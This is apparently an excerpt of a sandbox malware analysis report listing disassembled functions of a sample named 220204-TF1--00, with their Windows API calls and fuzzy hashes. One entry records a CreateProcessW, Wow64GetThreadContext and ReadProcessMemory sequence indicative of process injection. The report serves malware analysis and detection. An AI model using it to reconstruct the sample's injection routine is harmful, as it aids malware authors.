                    • Opcode Fuzzy Hash: 16db5a3c60e8a466cdaa027b75911e26bdd70c0790814ef229a6cfd293f4d8c4
                    • Instruction Fuzzy Hash: C7E08632181318F7D7311B54EC09FCA7F19AB05B71F108220FB14690E08BB52511979C
                    APIs
                    • _free.LIBCMT ref: 006E8FA5
                      • Part of subcall function 006A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9C64), ref: 006A2FA9
                      • Part of subcall function 006A2F95: GetLastError.KERNEL32(00000000,?,006A9C64), ref: 006A2FBB
                    • _free.LIBCMT ref: 006E8FB6
                    • _free.LIBCMT ref: 006E8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
                    • Instruction ID: f700886ff926444fbe831bed5dd9dafa298908e4d6579441592b90de3ff44311
                    • Opcode Fuzzy Hash: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
                    • Instruction Fuzzy Hash: 8FE012A174A7424ECA64B97DAD50AD357EF5F49390718081DB40DDB242DE24EC51852C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 50c551e167550c9585c3aecc6143546be3185b01cf1b65bc1581806c3adc2757
                    • Instruction ID: 4849a1d0197965e9fffad8a35c2f5f692bee955578f74eb8ad86a6973c2f97e5
                    • Opcode Fuzzy Hash: 50c551e167550c9585c3aecc6143546be3185b01cf1b65bc1581806c3adc2757
                    • Instruction Fuzzy Hash: 80224774508241CFDB24EF54C494B6ABBE2FF85300F158A5EE8968B362D771EC81CB86
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                    • Instruction ID: 7a2d44adb79ed36bc66b8c741f0d61a17ea375a54e65a4f577cdefa1a57877b7
                    • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                    • Instruction Fuzzy Hash: 0131C2B1604506AFC714EF28D8D1EA9B3AAFF49310725872DE919CB391DB70EC60CB90
                    APIs
                    • IsThemeActive.UXTHEME ref: 00684992
                      • Part of subcall function 006A35AC: __lock.LIBCMT ref: 006A35B2
                      • Part of subcall function 006A35AC: DecodePointer.KERNEL32(00000001,?,006849A7,006D81BC), ref: 006A35BE
                      • Part of subcall function 006A35AC: EncodePointer.KERNEL32(?,?,006849A7,006D81BC), ref: 006A35C9
                      • Part of subcall function 00684A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00684A73
                      • Part of subcall function 00684A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00684A88
                      • Part of subcall function 00683B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00683B7A
                      • Part of subcall function 00683B4C: IsDebuggerPresent.KERNEL32 ref: 00683B8C
                      • Part of subcall function 00683B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007462F8,007462E0,?,?), ref: 00683BFD
                      • Part of subcall function 00683B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00683C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006849D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 8ff0c1febe0f299465503b65c413a2710b17e61cf98c9b692703a4d8e3d34cc8
                    • Instruction ID: f21f6ae45d3c7e9bf8be635cd20d0c45b3fb9cfc87501f5d6c37fec84ad3ef61
                    • Opcode Fuzzy Hash: 8ff0c1febe0f299465503b65c413a2710b17e61cf98c9b692703a4d8e3d34cc8
                    • Instruction Fuzzy Hash: BE11CD71908311AFC710EF69EC4591AFBE9FB9A710F00861FF041832B1DBB49948CB9A
                    APIs
                      • Part of subcall function 006A594C: __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006A594C: __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006A594C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    • std::exception::exception.LIBCMT ref: 006A102C
                    • __CxxThrowException@8.LIBCMT ref: 006A1041
                      • Part of subcall function 006A87DB: RaiseException.KERNEL32(?,?,?,0073BAF8,00000000,?,?,?,?,006A1046,?,0073BAF8,?,00000001), ref: 006A8830
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: dbb0583fc9627dfaeb99b9d3724b0fcf186f204d1c0fbc16384ae2ebb1425a26
                    • Instruction ID: 4f494d59f613f37fd884b3a36f556a3d883767adbc9d02e4138423ca99c113d4
                    • Opcode Fuzzy Hash: dbb0583fc9627dfaeb99b9d3724b0fcf186f204d1c0fbc16384ae2ebb1425a26
                    • Instruction Fuzzy Hash: 68F0F93450021DA6DB20BA58EC019DF77AE9F03350F200029F80496292DFB08ED18AA4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: a46738ce6305c0be715eff8d4a5462043fb9809ed35c46c148c553ab1b7151a7
                    • Instruction ID: 69023b31d5db6c7b68bd52eb4d04c7d329185b848f2098d15487c07efd346652
                    • Opcode Fuzzy Hash: a46738ce6305c0be715eff8d4a5462043fb9809ed35c46c148c553ab1b7151a7
                    • Instruction Fuzzy Hash: 0D01B171C00619EBCF62FF698C0148E7A63AF82760F044219F8141B2A1DB358E21DF95
                    APIs
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • __lock_file.LIBCMT ref: 006A561B
                      • Part of subcall function 006A6E4E: __lock.LIBCMT ref: 006A6E71
                    • __fclose_nolock.LIBCMT ref: 006A5626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 60a72c0a99ee8c95f3caf05a6389ebc3cab34b59624f65f6b41cb10538e6a1a6
                    • Instruction ID: 2215f1a480e2ba2451cc1fc99f5ad0b4dac9800aad82b0d31b926a7082ffd4ee
                    • Opcode Fuzzy Hash: 60a72c0a99ee8c95f3caf05a6389ebc3cab34b59624f65f6b41cb10538e6a1a6
                    • Instruction Fuzzy Hash: 1EF09071800A059ED7A0FF75880276E76A36F43334F55820EE416AB1D1CF7C8D029F69
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03681A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03681AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03681B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: db6ebe1e75d616c1e9c9dec96c323a6504727d2e886c148b9c96fd9b77e44fd5
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 2712CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                    • Instruction ID: 311a9fd89d5efb0aced6474a126f4a1e9fb94442b5c047f382dbea9d84cedfc1
                    • Opcode Fuzzy Hash: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                    • Instruction Fuzzy Hash: 0531B679208A02DFD724AF18D490961F7A6FF49310724C66DE9498B765E730DC81DB54
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: ed17daadff39e4f7d96a2c581c34c873251841480592108cfe94e042834737b7
                    • Instruction ID: ed06ad4fdbfef65d97b43f9854f54596ca150062096e2fc40469d9388f8062ef
                    • Opcode Fuzzy Hash: ed17daadff39e4f7d96a2c581c34c873251841480592108cfe94e042834737b7
                    • Instruction Fuzzy Hash: 8B412574504341CFEB24DF54C484B5ABBE2BF45308F0989ADE8998B762C772EC85CB56
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 23147eae25e27b783aec34926c4dadc18396a5ae383f2bb8c3f8d8f8a84b3ac2
                    • Instruction ID: 8a1cb42dfdf99b8f6ea12b91c6b6540faf1539bb777dd23294ad0dc274d57830
                    • Opcode Fuzzy Hash: 23147eae25e27b783aec34926c4dadc18396a5ae383f2bb8c3f8d8f8a84b3ac2
                    • Instruction Fuzzy Hash: B22121B1604A09EBEB106F25EC427A97BB6FF14351F31C56EE486C51A1EB30D5E08709
                    APIs
                      • Part of subcall function 00684D13: FreeLibrary.KERNEL32(00000000,?), ref: 00684D4D
                      • Part of subcall function 006A548B: __wfsopen.LIBCMT ref: 006A5496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684F6F
                      • Part of subcall function 00684CC8: FreeLibrary.KERNEL32(00000000), ref: 00684D02
                      • Part of subcall function 00684DD0: _memmove.LIBCMT ref: 00684E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 75f2a81de3dc20ab6a61a0242c3385e4cb861c8f06a3a754f6437ccc4ecb71a2
                    • Instruction ID: 61709c2a4d317b159fc8543de97c180a5f714679029080f9488a0c1d00e3a996
                    • Opcode Fuzzy Hash: 75f2a81de3dc20ab6a61a0242c3385e4cb861c8f06a3a754f6437ccc4ecb71a2
                    • Instruction Fuzzy Hash: 6A110A31600306ABCB50FF70CC12FAE77EB9F84704F10862DF542A62C1DE759A059BA4
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 5f242a41f9ff6362ebb8a85a0ddba463d9c623a2ce5678cdfb2ccb68a3d911d3
                    • Instruction ID: 786f06edd5e0aa00710a3aec95bbd6f8e04a29c4088214f4c779f55c95edcb50
                    • Opcode Fuzzy Hash: 5f242a41f9ff6362ebb8a85a0ddba463d9c623a2ce5678cdfb2ccb68a3d911d3
                    • Instruction Fuzzy Hash: 412144B4508341CFDB24EF54C448B5ABBE2BF85304F058A6DE89A4B721D771E845CF56
                    APIs
                      • Part of subcall function 006D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                      • Part of subcall function 006D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                      • Part of subcall function 006D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                      • Part of subcall function 006D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • IIDFromString.OLE32(00000000,?,?,?,006DDAA9,?,?,?,?,?,?,?,?,?), ref: 006DDC57
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 75dacb53bc530cc134b4110ce129e88b279356e3e0b75f002209c037d32267da
                    • Instruction ID: 999e15ac6819e51c9e310727cbf36a833058f9744fca0deb355c149de681e85d
                    • Opcode Fuzzy Hash: 75dacb53bc530cc134b4110ce129e88b279356e3e0b75f002209c037d32267da
                    • Instruction Fuzzy Hash: 54F04975A40605EBCB00EF09D880AA67B5EAB05360F10C126ED08CE256D3F1E940DBA4
                    APIs
                    • __lock_file.LIBCMT ref: 006A4AD6
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: c03b50d73b964a99221c1ba6bdbf51964997dc2777d73e49a277f11904acb964
                    • Instruction ID: e8fda2c1d737d1e5b4f8940fe50576301ed007c1db2be380e7264c9e4cf3ab0c
                    • Opcode Fuzzy Hash: c03b50d73b964a99221c1ba6bdbf51964997dc2777d73e49a277f11904acb964
                    • Instruction Fuzzy Hash: 4DF081719402099FDB91BFA48C063DE76A2AF42325F044518B514AB1D1CFB88D61DF59
                    APIs
                    • FreeLibrary.KERNEL32(?,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 96987bcd57c58073c317448d95a86c14e91817f1ecfa02bf7f2ab5fd3f4c7229
                    • Instruction ID: 438ce7b9d9d57a3f8e57f0bb76671e8ddf59cda0d10e08eb1e77579524dd41a7
                    • Opcode Fuzzy Hash: 96987bcd57c58073c317448d95a86c14e91817f1ecfa02bf7f2ab5fd3f4c7229
                    • Instruction Fuzzy Hash: 30F03971505722CFCB34AF64E494852BBE2BF553293208B3EE2D782A10CB31A840DF40
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A09F4
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 75241352fce53a22da8dc0218950b619b3003dff07eacd3a8cbf75fce7c53e0e
                    • Instruction ID: d4163988a5149b6c025c9c7b23751a4ff3a6bd77ec9130b6866b87dfbce03382
                    • Opcode Fuzzy Hash: 75241352fce53a22da8dc0218950b619b3003dff07eacd3a8cbf75fce7c53e0e
                    • Instruction Fuzzy Hash: 49E0CD7690422857C720E6589C05FFA77EDDF8D790F0442B5FC0CD7205DD64AC818794
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 739664b7077bc92d2e4b152e87d0e25a1e04aa81dd318274774e675df3b97949
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: D0E092B0104B405FD7349A24D8147E373E1BF06315F00081CF2AB83341EB6278418B69
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: c8b885913397dcddac72bc67a5088bd6951389071ff611fe9e244a954a0e8264
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: C6B0927684020C7BDE412E82EC02A593F5A9B45778F808020FB0C18162A673AAA09A89
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                     • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
